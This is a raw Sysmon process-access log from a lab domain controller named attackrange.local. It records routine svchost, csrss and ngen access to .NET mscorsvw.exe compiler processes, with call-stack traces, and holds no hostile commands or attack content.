13:46:27.531{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F801-00000000A301}4196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.531{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F801-00000000A301}4196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.531{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F801-00000000A301}4196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.499{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F701-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.499{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F701-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.499{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F701-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.437{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F601-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.421{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F601-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.421{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F601-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.390{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F501-00000000A301}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.390{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F501-00000000A301}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.390{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F501-00000000A301}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.343{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F401-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.343{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F401-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.343{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F401-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.281{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F301-00000000A301}3460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.265{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F301-00000000A301}3460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.265{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F301-00000000A301}3460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.218{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F201-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.203{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F201-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.203{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F201-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.140{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F101-00000000A301}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.140{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F101-00000000A301}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.140{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F101-00000000A301}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319